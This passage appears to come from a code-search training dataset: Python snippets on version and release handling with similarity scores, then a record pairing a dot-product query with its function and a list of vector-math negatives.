\"_version\"]))\n\n # else:\n # comp_versions [component + \"_version\"] = \\\n # str (comp_versions[major]) + '.' + \\\n # str (comp_versions[minor])", "def get_version_string():\n major, minor, micro, patch, tag, relnum, is_release = VERSION\n\n version = '%s.%s' % (major, minor)\n\n if micro or patch:\n version += '.%s' % micro\n\n if patch:\n version += '.%s' % patch\n\n if tag != 'final':\n if tag == 'rc':\n version += ' RC'\n else:\n version += ' %s ' % tag\n\n version += '%s' % relnum\n\n if not is_release:\n version += ' (dev)'\n\n return version", "def kever(self):\n return self.kevers[self.pre] if self.pre else None", "def main(self):\n logging.info(\"Doing release for %s\", self.version.raw)\n\n if self.version.branch is None:\n logging.debug(\"No branch, assuming '%s'. Override with --branch.\",\n self.options.branch)\n self.version.branch = self.options.branch\n\n # No version specified, assuming a snapshot release\n if self.options.version is None:\n self.do_release(\n version=MwVersion.new_snapshot(self.options.branch))\n return 0\n\n if self.options.previousversion:\n # Given the previous version on the command line\n self.do_release(version=self.version)\n return 0\n\n no_previous = False\n if self.version.prev_version is None:\n no_previous = True\n if not self.ask(\"No previous release found. 
Do you want to make a \"\n \"release with no patch?\"):\n logging.error('Please specify the correct previous release ' +\n 'on the command line')\n return 1\n if no_previous or self.options.no_previous:\n self.do_release(version=self.version)\n else:\n if not self.ask(\"Was %s the previous release?\" %\n self.version.prev_version):\n logging.error('Please specify the correct previous release ' +\n 'on the command line')\n return 1\n\n self.do_release(version=self.version)\n return 0", "def getReleaseVersion(self, workingTowerName, infixStream):\n towerInfix = iccs_apex.whatInfixIsStream(workingTowerName)\n prefixStream, postfixStream = string.split(workingTowerName, towerInfix)\n releaseVersion, postVersion = string.split(postfixStream, \"wrk\")\n releaseTowerName = infixStream + releaseVersion + \"rel\"\n \n return releaseTowerName", "def get_version(self, params):\n return self.version", "def __getNullVersion(self):\n print(\"Can't get version\")\n return \"unknownVendor\", \"unknownRelease\"", "def test_release_tag(self) -> None:\n self.assertEqual(\"v3.14.15\", release_tag())", "def get_stack_version_before_install(component_name):\n stack_root = Script.get_stack_root()\n component_dir = HADOOP_HOME_DIR_TEMPLATE.format(stack_root, \"current\", component_name)\n stack_selector_name = stack_tools.get_stack_tool_name(stack_tools.STACK_SELECTOR_NAME)\n if os.path.islink(component_dir):\n stack_version = os.path.basename(os.path.dirname(os.readlink(component_dir)))\n match = re.match('[0-9]+.[0-9]+.[0-9]+.[0-9]+-[0-9]+', stack_version)\n if match is None:\n Logger.info('Failed to get extracted version with {0} in method get_stack_version_before_install'.format(stack_selector_name))\n return None # lazy fail\n return stack_version\n else:\n return None", "def postreleaser_before(data):\n\n data['dev_version_template'] = '%(new_version)s.dev'", "def get_ver():\n import subprocess\n\n proc = subprocess.run(\n [\"git\", \"describe\"], stdout=subprocess.PIPE, stderr=subprocess.PIPE\n )\n if not proc.returncode == 0:\n return\n v = proc.stdout.decode().strip()\n if \"-\" not in v:\n ret = v\n else:\n csum = v[v.rindex(\"-\") + 1 :]\n base = v[: v.rindex(\"-\")]\n count = base[base.rindex(\"-\") + 1 :]\n tag = base[: base.rindex(\"-\")]\n ret = f\"{tag}.post{count}+{csum}\"\n return ret", "def test_getNextVersion(self):\n now = date.today()\n major = now.year - VERSION_OFFSET\n version = Version(\"twisted\", major, 9, 0)\n self.assertEquals(getNextVersion(version, now=now),\n Version(\"twisted\", major, 10, 0))", "def get_latest_version():\n found_version = \"unknown\"\n version_re = r\"^## \\[(\\d+\\.\\d+\\.\\d+)\\]\"\n\n with open(os.path.join(__repo_root__, \"CHANGELOG.md\")) as changelog_file:\n for line in changelog_file:\n found = re.search(version_re, line)\n if found:\n found_version = found.group(1)\n break\n\n return found_version", "def test_finder_only_installs_stable_releases(data: TestData) -> None:\n\n req = install_req_from_line(\"bar\")\n\n # using a local index (that has pre & dev releases)\n finder = make_test_finder(index_urls=[data.index_url(\"pre\")])\n found = finder.find_requirement(req, False)\n assert found is not None\n assert found.link.url.endswith(\"bar-1.0.tar.gz\"), found.link.url\n\n # using find-links\n links = [\"https://foo/bar-1.0.tar.gz\", \"https://foo/bar-2.0b1.tar.gz\"]\n\n finder = make_test_finder(links)\n found = finder.find_requirement(req, False)\n assert found is not None\n assert found.link.url == \"https://foo/bar-1.0.tar.gz\"\n\n 
links.reverse()\n\n finder = make_test_finder(links)\n found = finder.find_requirement(req, False)\n assert found is not None\n assert found.link.url == \"https://foo/bar-1.0.tar.gz\"", "def current_version(self):\n try:\n return self.versions.latest()\n except DocumentVersion.DoesNotExist:\n return None", "def get_version():\n return about.get_version()", "def version_from_versioneer():\n\n # Attempt to get the version string from the git repository\n try:\n from .versioneer_version import get_versions # pylint: disable=import-outside-toplevel\n version_info = get_versions()\n if version_info['error'] is None:\n return version_info['version']\n return None\n except: # pylint: disable=bare-except\n return None", "def get_release_version(self):\n return self.get_property(ADB.VERSION_RELEASE_PROPERTY)", "def get_setup_version():\n if os.path.isdir(\".git\"):\n process = subprocess.Popen(COMMAND_DESCRIBE_VERSION, **SUBPROCESS_KWARGS)\n process.wait()\n version = process.communicate()[0].decode(\"utf-8\").strip()\n return re.match(re_version, version).group(1)\n else:\n return \"0.1\"", "def get_version(self):\n article_url = self.env[\"article_url\"]\n title = self.get_html_title(article_url)\n regex = r\"(?:(\\d+)\\.)?(?:(\\d+)\\.)?(\\*|\\d+)\"\n match = re.search(regex, title)\n if match:\n version = match.group(0)\n self.output(\"Version: {version}\".format(version=match.group(0)), 2)\n return version\n else:\n raise ProcessorError(\"Unable to determine version.\")", "def get_release(request):\r\n\r\n release = raven.fetch_git_sha(os.path.dirname(os.path.dirname(__file__)))\r\n return HttpResponse(json.dumps({\"release\": release[:7]}))", "def get_version_comparitor(self, requirement):\n if manage.is_inhouse_package(requirement.project_name):\n if self._prefer_final:\n log.debug(' in-house package, prefer-final')\n return easy_install._final_version\n else:\n log.debug(' in-house package, prefer-dev')\n return self.is_dev_version\n else:\n log.debug(' third-party package, always prefer-final')\n return easy_install._final_version", "def test_getNextVersionAfterYearChange(self):\n now = date.today()\n major = now.year - VERSION_OFFSET\n version = Version(\"twisted\", major - 1, 9, 0)\n self.assertEquals(getNextVersion(version, now=now),\n Version(\"twisted\", major, 0, 0))", "def version(self):\n\n if self.running() is True:\n return APIConsumer.get(\"/version\").content\n else:\n return None", "def previous():\n releases_list = releases()\n try:\n return releases_list[-2]\n except IndexError:\n return None", "def get_version_for(self,platform,version):\n def supports_platform(test_platforms):\n if test_platforms.upper() in ['ALL','ANY']:\n platforms = PLATFORMS\n else:\n platforms = test_platforms.split(':')\n return platform in platforms\n\n # Minimal required version check (for mainline releases)\n if self.min_versions:\n base_version = '.'.join(version.split('.')[:2])\n for base_min_version, min_version in (('.'.join(x.split('.')[:2]),x)\n for x in self.min_versions.split(';')):\n if compare_versions(base_version,base_min_version) == 0:\n if compare_versions(version,min_version) < 0:\n return None\n # Find the suitable test version\n candidate = '0'\n test = None\n for t in (t for t in self.versions if supports_platform(t.platform)):\n if compare_versions(version,t.firebird_version) >= 0:\n if compare_versions(candidate,t.firebird_version) < 0:\n candidate = t.firebird_version\n test = t\n return test", "def get_current_version(self):\n raise NotImplementedError(\"get_current_version is 
not implemented\")", "def test_get_next_version_MAJOR99(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (100, 0, 100, 0, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((99, MINOR, PATCH)))\n self.assertEqual(None, ver)", "def test_higher_version_preferred_even_when_tag_is_on_top_of_the_tree(self):\n try:\n self.prepare(tag_latest_version=True)\n self.assertEquals((1, 3, 0), compute_version(\n get_git_describe(repository_directory=self.repo, fix_environment=True, accepted_tag_pattern='repo-*')\n ))\n finally:\n rmtree(self.repo)\n os.chdir(self.oldcwd)", "def getPreviousBuild():" ]
[ "0.65761906", "0.64690495", "0.64539593", "0.6419955", "0.6369132", "0.6336212", "0.62359613", "0.62115157", "0.61312795", "0.612242", "0.6118793", "0.61041874", "0.6091029", "0.6033105", "0.59679747", "0.59453046", "0.5935324", "0.5899036", "0.58957833", "0.58908105", "0.588986", "0.5887754", "0.58852804", "0.58735377", "0.58613676", "0.5860372", "0.58529496", "0.5849485", "0.5845098", "0.5843697", "0.58230305", "0.5820289", "0.5814695", "0.58060443", "0.580507", "0.57865125", "0.5781339", "0.57723683", "0.57646537", "0.5748745", "0.57272667", "0.57245684", "0.5717995", "0.5716356", "0.5716356", "0.5716356", "0.57144606", "0.5700963", "0.5697977", "0.56908077", "0.5689628", "0.56882364", "0.5687746", "0.56748635", "0.566916", "0.5668753", "0.5663923", "0.5657436", "0.56427395", "0.56384134", "0.5635968", "0.5613581", "0.55834675", "0.5577913", "0.5566563", "0.55600566", "0.55552536", "0.5552548", "0.55496615", "0.5530032", "0.55245227", "0.55181795", "0.5516064", "0.55023676", "0.549576", "0.54921764", "0.5488585", "0.54839194", "0.54835063", "0.5478857", "0.5477313", "0.54742914", "0.5461384", "0.54477334", "0.5442732", "0.5440045", "0.5439412", "0.5437255", "0.5436031", "0.54263794", "0.54222083", "0.5421002", "0.5416864", "0.5414095", "0.5413003", "0.5409355", "0.5407969", "0.53891677", "0.53887737", "0.5384924" ]
0.6867934
0
v_1 w_1 + ... + v_n w_n
def dot(v, w): return sum(v_i * w_i for v_i, w_i in zip(v, w))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def vector_add(v, w):\n return [v_i + w_i for v_i, w_i in zip(v,w)]", "def vector_add(v, w):\n return [v_i + w_i for v_i, w_i in zip(v, w)]", "def vector_add(v, w):\n\treturn [v_i + w_i for v_i, w_i in zip(v, w)]", "def add(v: Vector, w: Vector) -> Vector:\n assert len(v) == len(w), 'both vectors must have the same length'\n\n return [v_item + w_item for v_item, w_item in zip(v, w)]", "def dot_product(v, w):\n return sum(v_i * w_i for v_i, w_i in zip(v, w))", "def dot(v,w):\n return sum(v_i * w_i for v_i,w_i in zip(v,w))", "def dot(self,v, w):\n return sum(v_i * w_i for v_i, w_i in zip(v, w))", "def dot_product(v,w):\n return v[0] * w[0] + v[1] * w[1]", "def dot(v,w):\r\n return sum(v_i * w_i\r\n for v_i, w_i in zip(v, w))", "def dot(v, w):\n\treturn sum(v_i * w_i for v_i, w_i in zip(v, w))", "def dot(v,w):\n return sum(v_i * w_i\n for v_i, w_i in zip(v,w))", "def dot(v, w):\n l = list(zip(v, w))\n return sum(v_i * w_i for v_i, w_i in l)", "def dot(v, w):\n return sum(v_i * w_i\n for v_i, w_i in zip(v, w))", "def project(v, w):\n coefficient = dot(v, w)\n return scalar_multiply(coefficient, w)", "def v(w,s):\n return w", "def add_vectors(v, u):\n return (v[0] + u[0], v[1] + u[1])", "def dot(v,w):\n return sum(v_i * w_i for v_i, w_i in zip(v,w)\n\ndef sum_of_squares(v):\n return dot(v, v)\n\nimport math", "def cg_apply_ws(A, B, w0, w1, w2, w3, pars):\n # We manually loop over one of the legs to lower the memory cost.\n vects = []\n # Generate the vectors to sum over in this manual loop,\n # for non-symmetric tensors:\n if A.qhape is None:\n dim = A.shape[5]\n for j in range(dim):\n vect = type(A).zeros([dim])\n vect[j] = 1.\n vects.append(vect)\n # and for symmetric tensors:\n else:\n qim = A.qhape[5]\n dim = A.shape[5]\n direction = A.dirs[5]\n for i, q in enumerate(qim):\n qdim = dim[i]\n for j in range(qdim):\n vect = type(A).zeros([dim], qhape=[qim], dirs=[-direction],\n charge=-direction*q, invar=True)\n vect[(q,)][j] = 1.\n vects.append(vect)\n # Compute the networks with the middle leg replaced with\n # vect \\otimes vect, and sum them all up.\n result = None\n for vect in vects:\n Ared = ncon((A, vect), ([-1,-2,-3,-4,-5,6], [6]))\n Bred = ncon((B, vect.conjugate()), ([-1,-2,-3,-4,5,-6], [5]))\n term = ncon((Ared, Bred,\n w0, w1, w2, w3),\n ([1,2,11,12,-5], [13,14,3,4,-6],\n [-1,1,13], [-2,2,14], [-3,11,3], [-4,12,4]))\n if result is None:\n result = term\n else:\n result += term\n return result", "def operations(h, w):\r\n A=np.random.random([h,w])\r\n B=np.random.random([h,w])\r\n s=A+B\r\n return A,B,s\r\n raise NotImplementedError", "def init_weight(w):\n shape = w.shape\n if len(shape) == 4:\n i, o, u, v = shape\n k = np.sqrt(6 / (i * u * v + o * u * v))\n w.data.uniform_(-k, k)\n elif len(shape) == 2:\n k = np.sqrt(6 / sum(shape))\n w.data.uniform_(-k, k)\n elif len(shape) == 1:\n w.data.zero_()", "def _func(w):\r\n W = _adj(w)\r\n loss, G_loss = _loss(W)\r\n h, G_h = _h(W)\r\n obj = loss + 0.5 * rho * h * h + alpha * h + lambda1 * w.sum()\r\n G_smooth = G_loss + (rho * h + alpha) * G_h\r\n g_obj = np.concatenate((G_smooth + lambda1, - G_smooth + lambda1), axis=None)\r\n return obj, g_obj", "def _eval(self, v):\n return super(weighted_sum_squares, self)._eval(self.weight * v)", "def weighted_sum(W, X):\n\n if len(W) != len(X):\n print(\"Dimension of weight vector should be same as input vector.\")\n return\n\n else:\n H = 0\n\n for i in range(len(W)):\n H += (W[i] * X[i])\n \n return H", "def nn(x, w):\n return np.dot(x, w)", "def SumM(v:'value', e:'error', 
w:'weight'=None):\n\n v = np.array(v)\n e = np.array(e)\n\n n = len(v)\n assert len(v) == len(e) \n if w is None:\n w = np.array([1.]*len(v))\n else:\n assert len(w) == len(v)\n w = np.array(w) / e**2\n wt = np.sum(w)\n w2t = np.sum(w**2)\n wti = 1/np.sum(w)\n yw = np.sum(w * v) * wti\n Qw = np.sum(w * (v - yw) ** 2)\n d2 = max(0, (Qw - (n-1)) / (wt - w2t*wti))\n wx = 1 / (e**2 + d2)\n wxti = 1 / np.sum(wx)\n a = np.sum(wx * v) * wxti\n e2 = wxti\n return a, np.sqrt(e2)", "def adj_se3(w, v):\n A = np.zeros((6, 6))\n A[0:3, 0:3] = hat3(w)\n A[4:6, 4:6] = hat3(w)\n A[4:6, 0:3] = hat3(v)\n return A", "def computeW(self):\n E = np.where(self.v > 0, 1, -1)\n # theshold the connections to only -1,1\n binary_weights = np.where(self.c > 0, 1, self.c)\n binary_weights = np.where(binary_weights < 0, -1, binary_weights)\n W = np.sum(binary_weights * np.dot(E.reshape(-1,1), E.reshape(1,-1))) # W = C * E * E\n self.W = W\n if np.sum(binary_weights) != 0:\n self.W = self.W / np.sum(binary_weights) # W / W*\n return self.W", "def vector_subtract(v, w):\n return [v_i - w_i for v_i, w_i in zip(v,w)]", "def vector_subtract(v, w):\n return [v_i - w_i for v_i, w_i in zip(v,w)]", "def vector_subtract(v, w):\n return [v_i - w_i for v_i, w_i in zip(v,w)]", "def vector_dot(v, w):\n return np.dot(v, w)", "def vector_subtract(v, w):\n return [v_i - w_i for v_i, w_i in zip(v, w)]", "def vector_and(v, w):\n return [v_i and w_i for v_i, w_i in zip(v, w)]", "def RSS(X,Y,w):\n v = Y[:,0]- (np.dot(X,w[1:]) + w[0])\n return np.dot(v,v)", "def apply_weights(self):\n w0_array = np.ones(self.N)*self.w0\n return w0_array + self.X.dot(self.w)", "def apply(self, v):\n u = np.zeros(self.Dimension, dtype=complex)\n for me in self.Elements:\n for index in range(v.Elements.size):\n if index == me.j:\n u[me.i] += me.val * v.Elements[index]\n u = Vector(u) \n return u", "def protrudes((u,v)):\r\n return ((u,v,W), (u,v,S), (u,v-1,W), (u-1,v,S))", "def extforce (u, v):\r\n\r\n for i in range (height):\r\n for j in range (width):\r\n u[i,j], v[i,j] = np.stack((u[i,j], v[i,j])) + dt * extacc\r\n\r\n return u, v", "def add_vectors(u, v): #11.22.5\r\n new_vector = []\r\n \"\"\"Because they have same length so we\r\n should take advantage from this one\"\"\"\r\n for i in range(len(u)):\r\n m = u[i] + v[i] # Get their value of i index at the same time!\r\n new_vector.append(m)\r\n return new_vector", "def _adj(w):\r\n return (w[:d * d] - w[d * d:]).reshape([d, d])", "def project(v, w):\n projection_length = dot(v, w)\n return scalar_multiply(projection_length, w)", "def vector_proj(v, w):\n w_hat = vector_hat(w)\n return vector_dot(v, w_hat) * w_hat", "def compress_weights(W, l):\n\n # numpy doesn't seem to have a fast truncated SVD algorithm...\n # this could be faster\n U, s, V = np.linalg.svd(W, full_matrices=False)\n\n Ul = U[:, :l]\n sl = s[:l]\n Vl = V[:l, :]\n\n L = np.dot(np.diag(sl), Vl)\n return Ul, L", "def distance(v, w):\n\treturn magnitude(vector_subtract(v, w))", "def optimise(w, w_delta):\n return w.assign(w - w_delta)", "def vector_or(v, w):\n return [v_i or w_i for v_i, w_i in zip(v, w)]", "def advect (u, v):\r\n # NOTICE: memory usage might be too high, could optimize\r\n\r\n # Store the values from timestep n\r\n un = u\r\n vn = v\r\n\r\n for i in range (height):\r\n for j in range (width):\r\n oldpos = coord (i,j) - dt * np.stack((u[i,j], v[i,j]))\r\n u[i,j], v[i,j] = interpolate (un, vn, oldpos)\r\n\r\n\r\n # Return values for timestep n+1\r\n return u, v", "def stabilizer_vector(v, g, n):\n vg = v.copy()\n w = 
v.copy()\n for i in range(1, n):\n vg *= g \n w += vg\n assert v == vg * g\n if (w['B'] == 0).all():\n return None\n return w", "def setParamsFromVector(self, params):\n #starting point of w_ih weights in vectorised params\n w_ih_start_pos = 0\n #end point of w_ih weights in vectorised params\n w_ih_end_pos = self.hiddenLayerSize * self.inputLayerSize\n\n self.w_ih = np.reshape( params[ w_ih_start_pos : w_ih_end_pos ], \\\n ( self.inputLayerSize, self.hiddenLayerSize ) )\n\n #end point of w_ho weights in vectorised params\n w_ho_end_pos = w_ih_end_pos + self.hiddenLayerSize * self.outputLayerSize\n\n self.w_ho = np.reshape( params[ w_ih_end_pos : w_ho_end_pos ], \\\n ( self.hiddenLayerSize, self.outputLayerSize))\n\n #end point of b_h biases in vectorised params\n b_h_end_pos = w_ho_end_pos + self.hiddenLayerSize\n \n self.b_h = params[ w_ho_end_pos : b_h_end_pos ]\n \n #end point of b_o biases in vectorised params\n b_o_end_pos = b_h_end_pos + self.outputLayerSize\n \n self.b_o = params[ b_h_end_pos : b_o_end_pos ]", "def vector_weighted_average(vf, weights):\n weights_sum = weights.sum()\n y_average = (vf[:,:,0] * weights).sum() / weights_sum\n x_average = (vf[:,:,1] * weights).sum() / weights_sum\n return np.array([y_average, x_average])", "def _derW(self, w, x, y, z):\n raise NotImplementedError()", "def wedge_distance(u, v):\n n_it = np.size(u)\n sum = 0\n for i in range(1, n_it):\n for j in range(i):\n sum += np.abs(u[i] * v[j] - u[j] * v[i]) ** 2\n return sum", "def scalar_proj(v, w):\n return vector_dot(v, vector_hat(w))", "def dot(v: Vector, w: Vector) -> float:\n assert len(v) == len(w), \"vectors must be same length\"\n\n return sum(v_i * w_i for v_i, w_i in zip(v, w))", "def vecvari1(array,W,B=None,sqrt=False,BB=False,BS=False,verbose=False,sizz=1,\r\n KCD=False,mulb=False,mul2=False,v3=0,**kwargs):\r\n \r\n arrs=array.shape\r\n #array=np.expand_dims(array,len(array.shape)//2)\r\n ashp=W.shape\r\n dstp=arrs[0]-1 if not((arrs[0]-1)==0) else 1\r\n if verbose:\r\n print(\"VECVARI1:: B? 
{},SQRT {}, BB {}, BS {}, SIZZ {}, KCD {}, MULB {}, MUL2 {}\".format(\r\n not(B is None),bool(sqrt),bool(BB),bool(BS),sizz,bool(KCD),bool(mulb),bool(mul2)))\r\n print('arrayshape',arrs)\r\n if verbose==2:\r\n print('Wsample',W[:,:,-1,-1])\r\n else:\r\n print('Wsample',W[:,:,-1,-1])\r\n if not(B is None):\r\n print(\"Bsamp\",B)\r\n print('wshape',ashp)\r\n if B is None:\r\n B=np.zeros((1,1,1,1),dtype=np.float32)#channel\r\n bt=len(B.shape)==2\r\n xi=(-2,-1)#xi=(-1,-2)\r\n x2=(-3,-2,-1)\r\n if len(ashp)==5 :#not all data and all weights == 3d data\r\n xi=(-3,-2,-1)\r\n x2=(-4,-3,-2,-1)\r\n if v3:\r\n if mulb:#probably a bad idea\r\n mul=array+B\r\n else:\r\n mul=array\r\n else:\r\n if mulb:#probably a bad idea\r\n B=np.reshape(B,(*B.shape,*[1 for _ in range(len(ashp)-len(B.shape))]))\r\n mul=(array*W)+B\r\n else:\r\n mul=array*W\r\n size=np.sum(W,axis=xi,keepdims=True)#shape=(outputs, channel)\r\n\r\n if BB :\r\n B=np.reshape(B,(*B.shape,*[1 for _ in range(len(ashp)-len(B.shape))]))\r\n if verbose:\r\n if verbose==2:\r\n print('mulsamp',mul[:,-1,-1,::dstp],'arrsamp',array[-1,-1,:])\r\n else:\r\n print('mulsamp',mul[-1,-1,-1],'arrsamp',array[-1,-1,-1])\r\n print('sizsamp',size)\r\n print('bbb',B.shape)\r\n print(\"size\",size.shape)\r\n if sizz==1:#not a good idea\r\n mean=np.sum((mul),axis=xi,keepdims=True)/size\r\n else:\r\n mean=np.sum((mul),axis=xi,keepdims=True)/np.broadcast_to([ashp[-2]*ashp[-1]],(ashp[1],1,1))\r\n if verbose:\r\n if verbose==2:\r\n print(\"meanshape\",mean.shape)\r\n print(\"meansamp\",mean[:,:,:,::dstp,-1,-1,-1])\r\n else:\r\n print(\"meansamp\",mean[-1,:,:,-1,-1,-1,-1])\r\n print(\"etst\",mean.shape)\r\n if verbose==2:\r\n print(\"ameanshp\",(mul-mean).shape)\r\n print(\"amean\",(mul-mean)[:,:,:,::dstp,-1,-1])\r\n else:\r\n print(\"amean\",(mul-mean)[-1,-1,-1])\r\n if mul2:\r\n if mulb:#probably a bad idea\r\n mul=((array-mean)*W)+B\r\n else:\r\n mul=((array-mean)*W)\r\n i=(np.square(mul))/size\r\n else:\r\n if v3==1:\r\n if BB:\r\n i=(np.square(((array-mean)*W)+B)/size)#B could be included\r\n else:\r\n i=(np.square(((array-mean)*W))/size)#B could be included\r\n if v3==2:#not a good idea\r\n if BB:\r\n i=((np.square(array-mean)*W)+B)/size#B could be included\r\n else:\r\n i=((np.square(array-mean)*W))/size#B could be included\r\n if v3==3:\r\n if BB:\r\n i=((np.square(array-mean)/size)*W)+B#B could be included\r\n else:\r\n i=((np.square(array-mean)/size)*W)#B could be included\r\n else:\r\n if BB:\r\n i=(np.square((mul)-mean)+B)/size\r\n else:\r\n i=(np.square((mul)-mean))/size\r\n if KCD:\r\n out=np.sum(i,axis=xi)\r\n else:\r\n out=np.rollaxis(np.sum(i,axis=x2),-1,1)\r\n if verbose:\r\n print(i.shape)\r\n if verbose==2:\r\n print('ishp',i.shape)\r\n print('isample',i[:,-1,-1,::dstp],i.dtype)\r\n else:\r\n print('isample',i[-1,-1,-1],i.dtype)\r\n if sqrt:\r\n out=np.sqrt(out)\r\n if verbose:\r\n if verbose==2:\r\n print('oushp',out.shape)\r\n print(\"outsample\",out[:,::dstp,-1,-1])\r\n else:\r\n print(\"outsample\",out[-1,-1,-1])\r\n print(\"out\",out.shape,(arrs[0],ashp[0],arrs[1],arrs[2]))\r\n if KCD:\r\n out=np.reshape(out,(arrs[0],ashp[0]*arrs[-3],arrs[1],arrs[2]))\r\n else:\r\n assert out.shape==(arrs[0],ashp[0],arrs[1],arrs[2])\r\n if not(BB)and BS:\r\n B=np.reshape(B,(*B.shape,*[1 for _ in range(len(ashp)-len(B.shape))]))\r\n return(out+B[:,0])\r\n else:\r\n return(out)", "def weight_update(u_ff, u_wc, alpha, beta, w, fan_all):\r\n mult_wc = np.matmul(np.reshape(hard_sigmoid_array(u_wc), (fan_all, 1)),\r\n np.reshape(hard_sigmoid_array(u_wc), (1, 
fan_all)))\r\n mult_ff = np.matmul(np.reshape(hard_sigmoid_array(u_ff), (fan_all, 1)),\r\n np.reshape(hard_sigmoid_array(u_ff), (1, fan_all)))\r\n delta_w = alpha * (1 / beta) * (mult_wc - mult_ff)\r\n delta_w[np.diag_indices(fan_all)] = 0\r\n w = w + delta_w\r\n return w", "def test_amp_sums_can_be_simplified(free_alg):\n dr = free_alg\n v = dr.names.v\n n, i, j = symbols('n i j')\n x = IndexedBase('x')\n r = Range('D', 0, n)\n\n tensor = dr.sum((i, r), (j, r), i ** 2 * x[j] * v[j])\n res = tensor.simplify_sums()\n assert res == dr.sum((j, r), (\n n ** 3 / 3 - n ** 2 / 2 + n / 6\n ) * x[j] * v[j])", "def __call__(self, w):\n l1_term = self.alpha * np.linalg.norm(w, 1)\n l2_term = self.alpha * 0.5 * np.linalg.norm(w, 2)\n\n return self.r * l1_term + (1 - self.r) * l2_term", "def distance(v, w):\n return magnitude_of_vector(vector_subtract(v, w))", "def f(t, x, n, v):\n total = 0\n for i in range(n+1):\n for j in range(n+1):\n for k in range(v):\n total = t[i][j] * x[i][j][k]", "def update_params(self, v_0, h_0, v_k, h_k):\n pos = np.dot(np.transpose(v_0), h_0)\n pos_vb = np.sum(v_0, axis=0)\n pos_hb = np.sum(h_0, axis=0)\n neg = np.dot(np.transpose(v_k), h_k)\n neg_vb = np.sum(v_k, axis=0)\n neg_hb = np.sum(h_k, axis=0)\n self.delta_bias_v = self.momentum*self.delta_bias_v + (self.learning_rate/self.batch_size)*(pos_vb - neg_vb)\n self.bias_v += self.delta_bias_v\n self.delta_bias_h = self.momentum*self.delta_bias_h + (self.learning_rate/self.batch_size)*(pos_hb-neg_hb) \n self.bias_h += self.delta_bias_h\n self.delta_weight_vh = self.momentum*self.delta_weight_vh + self.learning_rate*((pos - neg)/self.batch_size - self.decay*self.weight_vh)\n self.weight_vh += self.delta_weight_vh \n return", "def dot(v: Vector, w: Vector) -> float:\n assert len(v) == len(w), 'vectors must be the same length'\n\n return sum(v_item * w_item for v_item, w_item in zip(v, w))", "def w_update(u, H, gamma, D, C):\n w_next = [proj(H[i].dot(u), gamma[i], D[i], C[i]) for i in range(len(H))]\n return w_next", "def getParamsToVector(self):\n #vectorise and concat weights arrays\n weights = np.concatenate( ( self.w_ih.flatten(), self.w_ho.flatten() ) )\n # concat biases vectors\n biases = np.concatenate( ( self.b_h, self.b_o ) )\n # concat weights and biases into params\n params = np.concatenate( ( weights, biases ) )\n return params", "def feature_energy24(wv):\n return np.sqrt(np.sum(wv[2:22, :, :] ** 2, axis=0)).T", "def _optimize(self, v):\n v0, prob_h_v0, vk, prob_h_vk = self._gibbs_sampling(v)\n W_grad, a_grad, b_grad = self._compute_gradients(v0, prob_h_v0, vk, prob_h_vk)\n para_update = [tf.assign(self.W, tf.add(self.W, self.learning_rate*W_grad)),\n tf.assign(self.a, tf.add(self.a, self.learning_rate*a_grad)),\n tf.assign(self.b, tf.add(self.b, self.learning_rate*b_grad))]\n error = tf.metrics.mean_squared_error(v0, vk)[1]\n return para_update, error", "def squared_distance(v, w):\n\treturn sum_squares(vector_subtract(v, w))", "def sumouter(us,vs,lo=-1.0,hi=1.0,out=None):\n result = zeros((len(us[0]),len(vs[0])))\n for u,v in zip(us,vs):\n result += outer(clip(u,lo,hi),v)\n return result", "def weight_expr(self, t, w_plus, z, value):\n pass", "def quad(v1, v2, v3, v4):\n return [[v3, v2, v1], [v4, v3, v2]]", "def test_numbers_can_substitute_vectors(free_alg, full_balance):\n\n dr = free_alg\n p = dr.names\n\n x = IndexedBase('x')\n y = IndexedBase('y')\n r = p.R\n i, j, k, l = symbols('i j k l')\n v = p.v\n w = Vec('w')\n\n orig = dr.sum((i, r), (j, r), x[i, j] * v[i] * w[j] + y[i, j] * v[i] * v[j])\n\n res 
= orig.subst(v[k], 0, full_balance=full_balance).simplify()\n assert res == 0\n res = orig.subst(v[i], 1, full_balance=full_balance).simplify()\n assert res == dr.sum((i, r), (j, r), x[j, i] * w[i] + y[i, j])", "def vector_dist(v, w):\n if isinstance(v, list):\n v = np.asarray(v)\n return vector_mag(v - w)", "def V_particle_ablation(s_n, g_n, s_others, n_h1=64, n_h2=64):\n concated = tf.concat( [s_n, g_n, s_others], axis=1 )\n with tf.variable_scope(\"stage-2\"):\n h1 = tf.layers.dense(inputs=concated, units=n_h1, activation=tf.nn.relu, use_bias=True, name='V_h1')\n h2 = tf.layers.dense(inputs=h1, units=n_h2, activation=tf.nn.relu, use_bias=True, name='V_h2')\n out = tf.layers.dense(inputs=h2, units=1, activation=None, use_bias=False, name='V_out')\n return out", "def weights(self):\n \n n = self.n\n lambda_ = self.alpha**2 * (n +self.kappa) - n\n \n c = .5 / (n + lambda_)\n Wc = np.full(2*n + 1, c)\n Wm = np.full(2*n + 1, c)\n Wc[0] = lambda_ / (n + lambda_) + (1 - self.alpha**2 + self.beta)\n Wm[0] = lambda_ / (n + lambda_)\n \n return Wm, Wc", "def weno_nn(\n self,\n v: types.FlowFieldVal,\n dim: str,\n ) -> Tuple[types.FlowFieldVal, types.FlowFieldVal]:\n delta_neg, delta_pos = self._calculate_weno_nn_delta_layer(v, dim)\n weno_wt_neg, weno_wt_pos = self._calculate_weno_nn_weights(\n delta_neg, delta_pos,\n )\n vr_neg, vr_pos = interpolation._reconstruct_weno_face_values( # pylint: disable=protected-access\n v, self._kernel_op, dim=dim, k=self._k\n )\n v_neg, v_pos = interpolation._interpolate_with_weno_weights( # pylint: disable=protected-access\n v, weno_wt_neg, weno_wt_pos, vr_neg, vr_pos, dim=dim, k=self._k\n )\n return v_neg, v_pos", "def plotWeights(w):\n w = w[:,:,0,:]\n # rescale w to 0.0 - 1.0\n mincode = np.amin(w)\n maxcode = np.amax(w)\n w = (w - mincode) / (maxcode - mincode)\n\n out = np.zeros((15, 15))\n for x in range(0,4):\n for y in range(0,4):\n c = x*4+y\n out[x*4:x*4+3, y*4:y*4+3] = w[:,:,c]\n return out", "def dot(u, v, w, a, b):\n u_1, u_2 = u\n v_1, v_2 = v\n return (w*u_1 + b*u_2)*(w*v_1 + b*v_2) + abs(a)*u_1*v_1", "def expandW(w, n_hidden_units):\n i1 = 784 * n_hidden_units\n i2 = i1 + n_hidden_units\n i3 = i2 + n_hidden_units * 10\n i4 